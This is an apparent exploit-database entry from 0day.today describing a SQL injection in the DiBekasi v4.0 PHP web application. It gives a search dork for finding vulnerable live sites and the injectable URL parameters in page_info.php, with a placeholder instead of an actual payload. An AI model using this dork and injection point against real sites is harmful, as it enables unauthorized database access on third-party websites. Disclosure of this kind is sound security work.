[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DiBekasi v4.0 SQL Injection Vulnerability

Author
zee eichel
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13788
Category
web applications
Date add
23-08-2010
Platform
php
=========================================
DiBekasi v4.0 SQL Injection Vulnerability
=========================================

# Exploit Title: "DiBekasi.com - Ver 4.0 SQL injection  vulnerability
# Author: zee eichel
# Home: tecon-crew[dot]org
# Software Link : www.dibekasi.com
# Version: 10.4
# Tested on: Linux Ubuntu 10.4
# Code : localhost/[path]page_info.php?id_brt=[id]&id_ktgbr=[id][sqli]
# dork : "DiBekasi.com - Ver 4.0 "
-----------------------------------------------------------------------------
1. find the vurln site :

#dork : "DiBekasi.com - Ver 4.0 "

2. simple inject

exmp :
localhost/[path]page_info.php?id_brt=72&id_ktgbr=16[sqli]

=======================================
contact me at
zee_eichel [at] ymail [dot] com
=======================================
suddent_death, jimmyromanticdevil, ne0d4rkfl00d3r, guitarisnoize, aip_zenzacky, cassaprodigy ... and all tecon-crew.org
without you all am just nothing



#  0day.today [2024-07-07]  #